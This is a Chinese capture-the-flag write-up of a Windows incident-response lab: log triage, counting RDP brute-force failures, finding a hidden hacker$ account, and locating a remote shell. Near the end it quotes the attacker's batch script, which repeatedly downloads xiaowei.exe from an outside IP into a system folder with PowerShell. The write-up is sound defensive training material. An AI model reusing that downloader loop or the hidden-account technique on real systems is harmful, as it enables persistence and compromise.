怎么用外网校内网站做英语,苏州seo公司 翼好,蒲城矿建设备制造厂网站,竞价网站怎么做seo提示#xff1a;文章写完后#xff0c;目录可以自动生成#xff0c;如何生成可参考右边的帮助文档 文章目录 靶机简介1. 审计桌面的logs日志#xff0c;定位所有扫描IP#xff0c;并提交扫描次数2. 审计相关日志#xff0c;提交rdp被爆破失败次数3.审计相关日志#xff… 提示文章写完后目录可以自动生成如何生成可参考右边的帮助文档 文章目录 靶机简介1. 审计桌面的logs日志定位所有扫描IP并提交扫描次数2. 审计相关日志提交rdp被爆破失败次数3.审计相关日志提交成功登录rdp的远程IP地址多个以连接,以从小到大顺序排序提交4. 提交黑客创建的隐藏账号5. 提交黑客创建的影子账号6. 提交远程shell程序的连接IP端口以IP:port方式提交7. 黑客植入了一个远程shell审计相关进程和自启动项提交该程序名字8. 黑客使用了计划任务来定时执行某shell程序提交此程序名字总结 靶机简介
服务器场景操作系统 Windows7 服务器账号密码winlog/winlog123 连接端口为ip:3389 按照题目提示可以根据系统功能分析或桌面工具进行辅助分析 注意远控软件内IP为虚拟IP如在进行进程中没有找到相关外连应该是由于连接超时造成的断开了重启环境服务器或软件即可继续对外发起请求请见谅 注意题目中shell如需在本地分析提前关闭杀毒软件会被杀掉非免杀 注意winlog用户在操作关于系统权限功能时一定要使用管理员权限打开工具再去执行
题目来源公众号 州弟学安全 题目描述 某台Windows服务器遭到攻击者入侵管理员查看发现存在大量rdp爆破的请求攻击者使用了不同位置的IP(此处模拟)进行爆破并成功并成功进入了系统进入系统后又做了其它危害性操作请根据各题目完成填写 题目简介
审计桌面的logs日志定位所有扫描IP并提交扫描次数审计相关日志提交rdp被爆破失败次数审计相关日志提交成功登录rdp的远程IP地址多个以连接,以从小到大顺序排序提交提交黑客创建的隐藏账号提交黑客创建的影子账号提交远程shell程序的连接IP端口以IP:port方式提交黑客植入了一个远程shell审计相关进程和自启动项提交该程序名字黑客使用了计划任务来定时执行某shell程序提交此程序名字
–
如何进行远程连接可以看这篇文章 1. 审计桌面的logs日志定位所有扫描IP并提交扫描次数
首先我们进入靶机根据题目的要求审查所有的log日志 输入命令eventvwr.msc进入事件查看器 — 选择“安全”日志 — 手动查看 使用桌面的Fulleventlogview工具 — 工具筛查 这里我们发现桌面上有着类似于apache的服务器日志根据之前我们所学的Apache日志分析我们很容易通过命令去筛选相应的IP 这里我们随便打开发现有着许多的日志
这里我将access.log日志复制到我的Linux机器上进行分析不懂的可以看这篇文章 然后使用命令进行IP次数的筛选
awk {print $1} access.log | sort | uniq -c | sort -nr解释 awk {print $1} access.log : 作用从access.log日志文件中提取每行的第一个字段$1 原理 awk是文本处理工具按行解析文件默认以空格 / 制表符分割字段。$1表示第一列字段常见场景如提取 IP 地址日志中第一列通常是访问者 IP 示例 若日志行是192.168.1.1 - [23/May/2025:10:00:01] “GET /index.html HTTP/1.1” 200则提取192.168.1.1 sort表示对提取的字段进行排序 uniq -c 表示对连续相同的行进行去重并统计每行出现的次数。 sort -nr 对统计结果按次数进行降序排序从多到少 -n按数值大小排序-r降序排列-升序) 这里我们得到了几个IP再重新看题目”定位所有扫描IP并提交扫描次数“, 注意这里需要的是扫描IP 也就是说本地IP127.0.0.1或者没有攻击行为的IP都不算入
所以我们还可以针对这些不是本机的IP进行分别的查看
# 替换里面的ip分别分析
cat ./access.log |grep 192.168.150.67 |more
cat ./access.log |grep 192.168.150.1 |more
cat ./access.log |grep 192.168.150.33 |more
cat ./access.log |grep 192.168.150.60 |more 1针对第一个IP192.168.150.67我们发现它好像在进行目录扫描等操作 往下翻更是可疑还进行目录的遍历以及绕过
因此我们首先可以确定这个192.168.150.67是可疑IP
2针对IP192.168.150.1发现有一些js以及php文件的访问登录 其中大部分都是对网站的dedecms进行操作基本认定无可疑行为
3然后针对IP192.168.150.33,我们又有了新的发现
首先就是有nmap的扫描器的特征
众所周知nmap主要用于网络探测和安全扫描可发现网络主机、检测开放端口及运行的服务助力网络管理与安全评估。 所以又能确定一个可疑IP
4最后一个IP192.168.150.60
其实这是受害者的IP所以直接排除 综上所述有两个可疑的iP192.168.150.67和192.168.150.33 因此把他们的次数加起来即可 flag{6385} –
2. 审计相关日志提交rdp被爆破失败次数 题目让我们提交rdp被爆破失败次数也就是远程桌面登录协议RDP这个时候我们就要用到系统的日志 这里我们打开cmd输入命令eventvwr.msc打开事件查看器来找到相应的日志
然后把应用程序安全系统三个文件保存到桌面
针对题目所说的远程登录日志所以我们要查看”安全“日志进行分析 以下是一些常见的与登录相关的事件ID及其含义 4624表示帐户已成功登录。这个事件ID可以用来筛选系统中所有成功登录的记录4625表示帐户登录失败。这个事件ID可以帮助我们判断是否存在RDP爆破攻击等情况4634表示帐户被注销。这个事件ID记录了用户注销的情况 4647表示用户发起注销。这个事件ID记录了用户主动注销的行为4648表示试图使用明确的凭证登录。这个事件ID可以查看远程登录的相关信息比如IP地址等4672表示超级管理员登录4720表示新用户的创建
RDP爆破通常会产生大量登录失败的事件登录失败的事件 ID 是 4625。通过统计这些事件的数量我们就可以得出爆破攻击失败的次数。所以我们在”安全“日志中输入4625 进行查看 那最后根据题目的要求提交rdp被爆破失败次数 flag{2594} –
3.审计相关日志提交成功登录rdp的远程IP地址多个以连接,以从小到大顺序排序提交
根据题目筛选4624事件ID我们点击进去查找相应的IP地址 结果显示
这里也是得到几个IP但我觉得手动筛选还是太慢了 当然还有更便捷一些的方法我们直接筛选事件ID-4648 在Windows事件日志中事件ID 4648表示“使用显式凭据登录”即用户通过手动输入用户名和密码完成身份验证而非依赖自动登录或凭据缓存机制。该事件常被用于筛选通过远程桌面协议RDP等场景下使用特定账户进行显式登录的操作记录以便追踪账户登录行为及开展安全审计。 结果显示 注意但是使用4648筛选的结果数量较少所以要按情况使用 flag{192.168.150.1192.168.150.128192.168.150.178} –
4. 提交黑客创建的隐藏账号 这里就要介绍一下Windows查看隐藏用户的方法 1使用命令net use简单的查看 2cmd里输入lusrmgr.msc查看组策略 3到注册表检查系统用户信息 所以我们按照上述方法一个个查看
方法一
net user 方法二 lusrmgr.msc是Windows系统中用于管理本地用户与组的管理控制台程序Microsoft Management ConsoleMMC。查看账户信息、创建新用户/组、删除冗余账户以及修改账户权限配置等. 仔细观察还有一个hackers$用户这个用户比较有意思可能有的师傅是第一次见那我这里简单分析一下 简单来说这是影子用户Shadow Accounts是一类隐蔽性用户账户其特点是在系统常规用户列表中不可见但实际存在并拥有系统或网络访问权限。这类账户常被黑客用于隐藏入侵痕迹通过规避管理员常规排查来维持对目标系统的持久控制。 方法三 Windows 注册表中用户相关的完整路径 本地用户账户信息 路径HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 说明存储所有本地用户账户的加密信息需管理员权限。用户 SID安全标识符以十六进制形式存储如000001F4。 根据路径进行查找HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 所以结果 flag{hacker$} –
5. 提交黑客创建的影子账号 注意影子账号通过lusrmgr.msc和net user是看不出来的之前的组策略能看见纯粹是靶机自身的问题所以不用在意 这里也有两种办法告诉大家
方法一 命令wmic useraccount get Name用于查询本地计算机上所有用户账户名称的命令。它会列出所有用户账户的名称包括本地用户和系统用户。
wmic useraccount get NamewmicWindows 管理工具的命令行接口允许用户从命令行查询系统信息。useraccount指定查询的对象为用户账户。get Name获取用户账户的名称。
方法二 注册表不多说了直接查看上题的步骤 根据路径进行查找HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 方法三 使用D盾进行系统文件的扫描也能得到结果以管理员身份运行
所以 flag{hacker$} –
6. 提交远程shell程序的连接IP端口以IP:port方式提交
题目让我们提交远程shell程序的连接IP及端口以IP:port方式进行提交所以这里我们可以直接使用命令netstat -ano来看看系统中的所有网络连接 但这是错误的结果因为正常来说这里就应该出现一个可疑连接
但尝试了多次都无法成功给大家看一下正常的情况 所以结果 flag{185.117.118.21:4444} –
7. 黑客植入了一个远程shell审计相关进程和自启动项提交该程序名字 根据题目我们可以检查计算机上的计划任务以及启动项等 搜索”计划任务“即可
这里我们发现了一个xiaowei.exee的恶意程序有这个定时任务触发执行
同理也可以通过工具进行查找应急响应中工具的使用也是很重要的 随后放进云沙箱里看看会造成什么危害 常见的威胁情报中心 银河麒麟ThreatBook银河麒麟是国内领先的网络安全威胁情报服务提供商其威胁情报库包括恶意软件、攻击源IP、域名等方面的信息。 国家互联网应急中心CNCERTCNCERT 是中国政府统一组织和协调全国互联网安全工作的部门其威胁情报库包括漏洞、恶意代码、攻击事件等方面的信息。 漏洞盒子KnownSec漏洞盒子是一家致力于网络安全防御和攻防技术研究的公司其威胁情报库包括漏洞、恶意代码等方面的信息。 360威胁情报中心360 TI Center360 威胁情报中心聚焦于威胁情报、安全事件响应和恶意代码研究等领域其威胁情报库包括APT攻击、恶意URL等方面的信息。
结果显示 结果 flag{xiaowei.exe} –
8. 黑客使用了计划任务来定时执行某shell程序提交此程序名字
随后我们找到程序的位置去查看还有什么收获 用”记事本“打开
echo off
:loop
echo Requesting download from 185.117.118.21:1111/xiaowei.exe...
start /b powershell -Command Invoke-WebRequest -Uri http://185.117.118.21/xiaowei.exe -OutFile C:\Windows\system64\systemWo\xiaowei.exe
timeout /t 300 /nobreak nul
goto loop脚本的作用
定期从 IP 地址185.117.118.21的服务器下载一个名为xiaowei.exe的文件并将其保存到系统目录C:\Windows\system64\systemWo\下。脚本会无限循环执行这个下载过程每次下载间隔 5 分钟300 秒。
所以结果为 flag{download.bat} 总结
结束。
